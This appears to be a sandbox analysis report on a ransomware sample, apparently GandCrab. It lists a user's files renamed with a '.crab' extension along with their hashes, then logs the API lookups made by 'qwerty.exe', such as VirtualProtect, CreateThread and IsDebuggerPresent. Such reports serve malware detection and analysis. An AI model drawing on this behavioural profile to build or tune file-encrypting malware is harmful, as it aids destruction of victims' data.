c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.bak.crab 3.45 KB MD5: dd1133e5b5e35fdaeef4bd4c93a1227f
SHA1: aca1ee2c15f25214938ad328690cad79d2cd9775
SHA256: 41717a5aad2d8165d33536d3aa1362d3ed1d5cd594f4b5cd36169f9f3ac263ef
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\sessionstore.js.crab 1.07 KB MD5: 044297ff76243f8948ce18ea32b6571d
SHA1: 2a9fc31c68fb0ca86bcdd7231bdf41492b44cde3
SHA256: a8545355a3d7200b8cba56307d62cdeab59f9b7c285216f0fb18286de16f889a
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\signons.sqlite.crab 320.51 KB MD5: 2f77dd87cf336287fab3a982a408bc39
SHA1: 2020e9971f5d248c5b62f53a360dc2d53d8fcdbe
SHA256: b1b38dd5989b3c9842abfb52d5cd41b70cbae813d08e632dae3bbb9ef3fe6111
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\times.json.crab 0.54 KB MD5: 9120fba88c8301edcd83aef13681a6e3
SHA1: a79cb48a9d82cd2b38a0ac34d377bdab0c28be9f
SHA256: 158e57bce0064cab348f4212ff1102e1114acbdb403dfebc8d1f9d0c367fe10e
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\urlclassifierkey3.txt.crab 0.66 KB MD5: 1f2f94922be60c4c0bc511bc371ef6fa
SHA1: d820908c54097814db4af4b4c916376687ed3dc5
SHA256: 0ecaea1bca266c8e25c592cb45c8a7624483e0e0e7fc6b54feba8f88ba8d804c
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\webappsstore.sqlite.crab 96.51 KB MD5: 2a5f341cfbb822651ade4db8daccad1a
SHA1: cf5df8f0c3a643caab8bab46f5f32bddfe08e4b1
SHA256: 657c82bb02450ff0f0e269507cb4fc4642334ce13c7540b287e4683c357cf01d
False
c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles.ini.crab 0.62 KB MD5: d1f4818f0d0f1961f6220380f6b0b47c
SHA1: d0fe66c44f3ce93eff7876fc049e17b66fbcd148
SHA256: 27c284016307cc84691ca171bdbf46695f89c39593c379c5fec4107813085143
False
c:\users\aetadzjz\appdata\roaming\nsfhq9iixehn.mp3.crab 53.32 KB MD5: 8e6d3b4010e0810bb91c2b052581c243
SHA1: d127861427ba85940a3620ff8ebb1e004e4a9d8c
SHA256: a171384dd2280d88e0b39020febff974a6da97e172d3923562f4269803f9fda3
False
c:\users\aetadzjz\appdata\roaming\pw42a5sxj u9o6kox3r.bmp.crab 60.24 KB MD5: 8b2573aa3d420e8d17b8d9814a66cf23
SHA1: 7823e32f4714de7a18dd6f201bc14b73cbc693b8
SHA256: bf798e0302a510bc5782f82aef67412c69fa3efa3f8c408dac59d5d4fc6132fe
False
c:\users\aetadzjz\appdata\roaming\r3s44pcf_.mp3.crab 60.23 KB MD5: cbe4f214abef50398e0a5bee89d25432
SHA1: 1222abb35ce9c15f4f3d762ce3b3ba94d3d93b40
SHA256: 321ec29ceedb53a5c38626c72005a6eaa3ac15c5a556c2e521dcc91b74183411
False
c:\users\aetadzjz\appdata\roaming\rbqhyjr3.jpg.crab 4.71 KB MD5: 5444e09c3cfcd8f91a52ba80c5a4c72e
SHA1: e5da62f625038fa1b4140b72a2f68b3658efca1f
SHA256: 29e5ea4f2435c55b32746f389ec1c8a9f97b4cccf4a6a8ee439857dbf8b239cb
False
c:\users\aetadzjz\appdata\roaming\rosfma.pdf.crab 70.27 KB MD5: cd946c2a6769bdf5e548ffc5951d1ef5
SHA1: dcdaedc79499a5f36231753d2d7241c47025cdc6
SHA256: 345b984ee483dc9cfd9ce7ba40ddc97ea9e5c5d427463dff8dd1fd82fea7906f
False
c:\users\aetadzjz\appdata\roaming\skype\roottools\roottools.conf.crab 0.59 KB MD5: 6b866cad1de6cd473bf6678f63aa13b7
SHA1: ecb36d9de47e2bd398a0aa4220b23245d3f7d9db
SHA256: 801c17f85907eac9a93a9e65eeb6756c9d5b1231f681cfd8ad595522acc8453e
False
c:\users\aetadzjz\appdata\roaming\swbc6q1io.flv.crab 19.24 KB MD5: c6ad3e4f40818e634ab391c4f3fca06d
SHA1: 8a34e14f1496d57d4870b5c8766638c14d0e177d
SHA256: dd0ba3f551bd7f3e8de53c8af17ef54ab121d56e6c301343026a0c25af6e05a8
False
c:\users\aetadzjz\appdata\roaming\tkorygrkn29mmvpbav2.bmp.crab 95.63 KB MD5: 93abaa298d193f885236ccea53668ae5
SHA1: 65e3b2763a7271b35d2c7452a46cd84cf9b7eb51
SHA256: 1a1d74e58f263928e5883f030b909add1550dacb28a884319d5bd640a535d6c8
False
c:\users\aetadzjz\appdata\roaming\un55ond.m4a.crab 86.99 KB MD5: dc7056f8a183ea849f80c53b22d8eb15
SHA1: b9c145545219406b9000cca9f16509a5d3a652ee
SHA256: a28b03e260996b4eff2452ad7f7c43637817648c4bf9b3226a8bebce9e4893c8
False
c:\users\aetadzjz\appdata\roaming\vbbt 2q.mp4.crab 41.04 KB MD5: e9fc063ddcad0e00e43568c454e4ff4c
SHA1: cb229bfd2f703430ad765b9e20f179396f6cbd4c
SHA256: 263fe3de102991774e4b23f478abe82700e0aeeebde1cbccf7d43a218268d072
False
c:\users\aetadzjz\appdata\roaming\viqn--g5ozdmhmyena0.wav.crab 28.10 KB MD5: d39f691cbc099270e6aa374fed5dd04e
SHA1: c6e8996b5e339e94561393feee363345a413e33c
SHA256: 6929db13934732b62189e0341758976c14de56deea679e10f5abed2a58d3b905
False
c:\users\aetadzjz\appdata\roaming\wuajfwillng.gif.crab 29.07 KB MD5: 31183743c595e8dd2ff329e40d7f5170
SHA1: cb4e04b1b947ff1fdd2a61a982527ddfe99444dd
SHA256: 22bee3ea807cc400ab89839e36141a3eaa3056c080b969d872ad8fc1b283e49e
False
c:\users\aetadzjz\appdata\roaming\x0hveof5uk.mkv.crab 74.29 KB MD5: d2844178b431d14adb8c7e40419d28e4
SHA1: b2a75f06d39ced688581e7c65747a70027a3ebaa
SHA256: dfbb291e244d1da71f5fd4aa330d5c6cde726986a64773a9c08966ba2d2a6e13
False
c:\users\aetadzjz\appdata\roaming\x2lpreezieslnienntqp.mp3.crab 64.70 KB MD5: dc9b5ed3c64227ef09f41d15bef128e1
SHA1: c126579fc745fa5ddbf4842a935ae1e04afb215f
SHA256: 6e80504136596ecac2d6f8be7fc8fe624e73015e9e1ae854c9d29b2540b8029f
False
c:\users\aetadzjz\contacts\aclviho asldjfl.contact.crab 1.66 KB MD5: b64a12cb990e06aee6981646b3dfdf62
SHA1: e777f9840d845f2f2d11517e01ad38b844c986de
SHA256: b34e84bc146f1e8eb76c43fe181b33c3a346c2b936528a9917705fa49fa8d49b
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\2jw56mgiggcpec.jpg.crab 21.51 KB MD5: 1557cb674023f3e1a8d8d7814cfe03b4
SHA1: fe6a3f7914db44df5ec1eec79b8fdc50aafd6f1c
SHA256: a314b78c682d64d42cc5c6692d41b70673264184f997e9f63ca2a656b7b00226
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\buedzinr1.png.crab 66.84 KB MD5: f777f65b4a1ef7cc7282646f279b6389
SHA1: 6fe23f1832cdcee93fc13274e853a6225f9c4c1b
SHA256: a9e22fa2d1c960611fa45c0b1e1c7437c27fe9b84505c91e43c616fd807cb0b6
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\fvvrndq4b5y8qykyluw.png.crab 12.15 KB MD5: a68057d5ec81bfb96eef1bccc2415b47
SHA1: 043f8fa61ddb5feea1e80746ef8ba4fdb8f87be9
SHA256: 827aa1b03d2148553dfe5291958fcf2293c3cd70c94cb0205c733546583f4ed0
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\v8huw sopdqu6738.png.crab 36.12 KB MD5: dc77d646b543dbcf6bb81e224346ddf0
SHA1: 3513ccfa7b0a61ccd0706aadf403a8b53a1a4248
SHA256: 3776aea536cb6448d5b1661860801584f9f78269bb5dc843dbdf4eeaad34dc1f
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\y2k2blacya.bmp.crab 22.41 KB MD5: e6b725d6209a529b40e305c68a149145
SHA1: 3bdb9149e7f065fb29a801fdded3ff86d0b7b498
SHA256: 54ca95f45d330df1afe5ef2ddfe1d33c05d13aeb8a31d538f7b1016f29636b3a
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\_5dyijt\euddoue.bmp.crab 35.27 KB MD5: badc994e83ab702978cd5189df0eb7cf
SHA1: 54a131d4ac0db34213452db22f4f90640a57a30f
SHA256: c1c7f725d3fbba3159d601f82719b91ea903215aee13c0d05b7ba2050ffac5a0
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\_5dyijt\jpr87q6jyleiyye.bmp.crab 36.84 KB MD5: 66161fbb26ffdbae615010a37dffe0cb
SHA1: 5a6355635174d73a4aafbb3a519ad6d1c5552a84
SHA256: e7848d5994a520f059bec2f65b6990d49f50aebcd1fb067cf383f0d767753715
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\_5dyijt\tugfvh2ouasjr2.bmp.crab 12.87 KB MD5: 44a3d6a0f75670d9ed08cfc706dfb781
SHA1: 106a80e0890e9af72bd32a596e0af9679531e997
SHA256: 9bd51c2751ab8acf1a6d38ddfaa42c73c2deebb04e423cbcdaf3ea63cad4be22
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\oq3l.png.crab 22.66 KB MD5: 7093eaff874409872499a3c7d62d184c
SHA1: 863b52e103ee495419f4de25cfd419b71b83421e
SHA256: cfb4cbc36b0ea547545038ecc68cbf14309b81a91b86bf4293a6fe6692e79786
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\bntial64_9rfqgce.png.crab 68.49 KB MD5: b6c960bb9b5e5c20db591b240c553498
SHA1: a27f97275e94e10919589583b455a52830341f7d
SHA256: c00555448128a7517bbc46434e9386b7f2ec575edee0fc8f8bac69b6d83c8868
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\sbqapk9akg.bmp.crab 94.41 KB MD5: 30cd5744d7c53f5aab5f27624226e77c
SHA1: 4b2d18b530c070aa793872311b46f0f263bf3f0e
SHA256: e676ebab207b9fdc90783397ddba5fd3cc322b4738e7fd92c7ea7d573552e1d2
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\sj8oek-7lm7xag.png.crab 19.46 KB MD5: d143d3d35cf33dbc3b2309567fae452e
SHA1: 184cfc785f2b15cff87c13376a4b54c09fc61aee
SHA256: 76a15317d462d545491257190e053c4009f72cc43d4766637e5ee8476e6ade7b
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\xbezwnngcfmwaoec2\6rxv.bmp.crab 67.96 KB MD5: 966a65c6652d8b596c88629ed6f1c46a
SHA1: c141b1097f17fe24a42be6cf537ea3c809349997
SHA256: 05a5e1db177ab940c5d0a0dd40f5a34c35a54814ec01d89b482ecd70261aee9b
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\xbezwnngcfmwaoec2\k37qtbalkl2av8zux7n7.bmp.crab 91.63 KB MD5: 5ecec0b25db6190d069c59a5aab5c197
SHA1: 2419df752f77d4547ed8203e867d93919c1f7b49
SHA256: 32713096365d6af3bcc1293be1a9bd9b9d8e5f2a6bb04f8974e8535eb8330337
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\t3chsstxvuim04r b3m.jpg.crab 76.80 KB MD5: 5ae01c6c6467b3eac2600ac3c507d773
SHA1: c606c17bac86ee27a0a4bb0a3bf4ac42fa7e2351
SHA256: 0ae00668e74c6aca1c14cdc23ebd92696732d197fe20066ce009c778633c971f
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\yvwcb0nxm xjvf-.png.crab 75.27 KB MD5: a1d79d48a5f8f5d066bb792d1cda7546
SHA1: b9bead8380d5bf088d6e899cec2e63614f8b21ab
SHA256: 829644569c714f34659447c84471755c3a1915805d4b811da72f04e495310f74
False
c:\users\aetadzjz\pictures\ysxdqwmk31.png.crab 82.65 KB MD5: 40e4445abc3ac6511fa6b2b5320276de
SHA1: f72af945c1b386ab29866d290433a8062770c6e9
SHA256: 2da8ee04250c35fc0aa05408f252c1b81a74716bc69e46b6e1264a1b07b08fde
False
c:\users\aetadzjz\pictures\_mbbu0k-_iu.bmp.crab 47.07 KB MD5: bebe8365327fefef564d330b0f425d4a
SHA1: 94231355c75cd1b8800f43c45d6d87cdd12e0c71
SHA256: cba83c1b9dee7d8c9b980fde4aa4fae0037e1f1f759c40b3dab6b32ec60ce614
False
c:\users\aetadzjz\searches\everywhere.search-ms.crab 0.76 KB MD5: 45fc0c46540707624254323d2016b19f
SHA1: 790150a90efbaae364c11fe9d3c37f9bbc07ef6e
SHA256: b33f9814420922f83557cbab25934db0a07476bd7b859b4f563d374256aedbbf
False
c:\users\aetadzjz\searches\indexed locations.search-ms.crab 0.76 KB MD5: eac42fda738e8492e9cae54aa3a88b77
SHA1: 3d56029d4e5f6d06573941e2f44fe3731d3b727f
SHA256: c851a6348cd53f74f178cd6e866a82d5c2422d6bdb199689a0deda4cff665dd7
False
c:\users\aetadzjz\videos\-sdky.swf.crab 50.66 KB MD5: 8b26582feadb3045f269d5dd82f80717
SHA1: 2de4860056378366f34f217702264445a4d65918
SHA256: 612a51298d8da05933b9b97549657ec53d02ae48b63d09944dd749606f5790c9
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\3uxehkbbxw-r\qdd7a0e-a.avi.crab 78.49 KB MD5: 415f32a69c2efdca6f289d524e08618d
SHA1: f8beb27f79865da2342a31ae7772aba5f3e8747f
SHA256: 27945df97ad1a906a8b6843d6379f387896a04abafe9da335ad272727305bdcb
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\3uxehkbbxw-r\tls2n.mp4.crab 81.84 KB MD5: 8f6f99b2579409902820b36a9d2bb746
SHA1: fad909c654608927814791d6d0034815ff754bcb
SHA256: a9b2ce148fb9b7a836ce1e5ea2f8d6043cf90d505b751b2dacb61f1554158d54
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\8o9xxt.swf.crab 9.38 KB MD5: 685d7f0f30d0e85f4aeb5ae172d79765
SHA1: 6152f9463a112a62bcb21771e0b0754e0a46eaaa
SHA256: 00494cf7a7c3612cc5c8a7dbd21db0c5f2bb3ba85e7c977430c9fd0963372089
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\ej9vcoke2lsjiudxsxx.swf.crab 52.96 KB MD5: 4829d92ce2530e476d95452b399aa7b0
SHA1: fc8884edc6482df9f5dbf7a0f4a2f45d7338b9cc
SHA256: b6a5bbf092e9eb0a056e08f66a02251a8056c1f34917e7f22cae1f2a8f38ca80
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\hx2dzktlxgyxba8.swf.crab 9.62 KB MD5: 6dffe19fb887386ab4a89854dab9d72b
SHA1: 1a761dcb09bb4aebf5d8c171c6dac97e108b629a
SHA256: ac51f72f362b745397b58e47fe97dc41d9cb1cf92a757b081555305712a2460c
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\lfjh1xl3c6i19s5hu2-j.avi.crab 37.85 KB MD5: d8b613f09fbe8bfaa78fb6ca4244733a
SHA1: 764b6c4b3e2556341bf75211b86f0a6a5d40e3c2
SHA256: 9cbb015d9ff86e7df0286d6b0661f57eccaee44cb1d921d9b233a918ddcdaf50
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\sh0kyzrkmp\k6c95ac_bo9_y8z.flv.crab 46.76 KB MD5: 7ba4e89fafa3c27d2493a663e19afb1b
SHA1: 6ffd0c5d1bf63278347ecbb5ed141050c5d37148
SHA256: f71820e01ae6135ff899ad69c9903f97e1c5e005bc9045899192987d514022bb
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\sh0kyzrkmp\rlarulpws8rv.flv.crab 29.45 KB MD5: 926aa9d2a15e5520636941ac7f4d5f6a
SHA1: 16f2d18dd0b632947ae5af7bd76a52e53a5508ae
SHA256: ef5ef401ba0e10fc2810839dbc47f940d5af46aa5a45cc5c1ffe0c8ea80a86f1
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\sh0kyzrkmp\ze71h6cqysdxzzlpi hb.mp4.crab 71.85 KB MD5: e3995d56fda78e0a2f1ec2f3373e4a30
SHA1: 672499e10b964e786599605df198269bb270550a
SHA256: 7b72c57beba0c7e314c724962670ac55197a2921d31f70e5d537c70186db203e
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\v7z3 2hnk.avi.crab 70.99 KB MD5: a6d321861a58561acd24f6b27b596a21
SHA1: ea72db883c1d5bfd948afe21abb9f20ab12a2cdf
SHA256: 09a0dd5aedb55d77b4d1eb87afd7cb792852d7561ab9e21944c2043754a2e7e8
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\vc-v.avi.crab 88.80 KB MD5: d09829de813cca86b2be2d36a5249814
SHA1: bafd736e794dd3deeebfa0ae09b3db36bf8798da
SHA256: 63e6649e8d1198f645f3f46a7ef44991a18b5324e8ce8b669201aa2a63adf852
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\-euz-s.mkv.crab 55.71 KB MD5: 6f77f67d83e09b397f387a44fe888369
SHA1: eb1f4f91ffab894ae82521e37d62ceae32ed49ec
SHA256: 488aace7046ae164c9872a71d7155c67ed710a0dbb05468afc0ac69cd3e3aa5c
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\52oq3vg.mp4.crab 19.20 KB MD5: d8b414e1cb96db4137eb1f3baa87a140
SHA1: 72a3d76d426a39140d923510a402ac467085965b
SHA256: b2e875ac4506587df20d2172c7bb089c7d1c833fa85ffac2b5b567105baf1166
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\lvy0punrn5f.swf.crab 44.71 KB MD5: a70d0962c5595975688a0f4fbb940bb1
SHA1: f72af1fb85967020bb734cb7f8248acd7cc7736c
SHA256: ab77152f81d717f7649818430498db47aa96c32fac4f834569fffc8c2a93fc84
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\ogub3um-1ki.mkv.crab 89.52 KB MD5: 5e21d5570bf52bb174eeb1bc3ca6aa74
SHA1: 739c47cdcec06b05bd79c516273f18faee9859fa
SHA256: 9da1322d4f76b604937aa520ddb1acfb05451bd942f9644ce19bf018ffc68cbb
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\soib.mp4.crab 14.77 KB MD5: 8147b5f0e3e065cd3b76477ab59f0cf9
SHA1: 72fa67c9c6245d3c9b41b5100c838c563c61220a
SHA256: f8b03c4166784ef5df70765714af5b3210708555cbb17f598cb1de941b5db5df
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\fuyv 5cjgyx2.flv.crab 26.13 KB MD5: cb465ed56818d04f0985e03a48a2b4b8
SHA1: e9d8614314d98f2003c06835ecd896b2c54ab7bb
SHA256: c3bdef3836ef49fc68cb39aebd129457ee6fca02b24467e08a2752048e10481b
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\gbpnutxd-3d.mkv.crab 7.93 KB MD5: 3eb5efe8997c9cbc7915cc2ef2fee42d
SHA1: 541ef6c84040a93bd508e697cc6e6a7a7d271c8e
SHA256: 76dd101cdcd45d6c43736261661dcc7f9313b2929b6f33c3f4a9d73e4cb49bd9
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\gvgh.mp4.crab 10.88 KB MD5: 02633b3554556507fa414e7b8630eb6e
SHA1: 843ddc8a7f274763f7a8fe5aadd5f78a32c43287
SHA256: 0e26de403a36c48b7e1a254cf53d090b423421a6fdb0e116910d9232dd5c7cd6
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\h7olyvsh.swf.crab 97.41 KB MD5: 221f2340ff31e1b38466c2e2b3ba4ee1
SHA1: c3e0ddb7a0c26acde3107b6269058bf8eb9d26dc
SHA256: 3f983a8e3d8f55af8a45080bbb05aa937c498a92d0243e1195a64348ce421be8
False
Threads
Thread 0xa48
375 0
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:36 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74540000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74540000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74cc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74cc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74cc4208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74d447f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Load module_name = kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x74cc168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74cc1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74cc1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74cc10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74cc4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74cc3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7712d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74cc1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74cc7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74cc1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74cc1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x74cc1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74cc49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74cc1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74cc7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74cc34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x74ce7aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74cdc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74cc435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x74cc195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x74d4454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x74cc1328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x74d67bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x74cc469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x74cc51a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x74cc1450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77110fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77109d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x74cc4a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74cc192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x74cc170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x74cc51b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x74cc3531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x74cc4d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x74cc14b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74cc1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x74cc1725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x74cc3509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x74cc51e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x74cc51cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74cc5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x74ce772f True 1
Fn
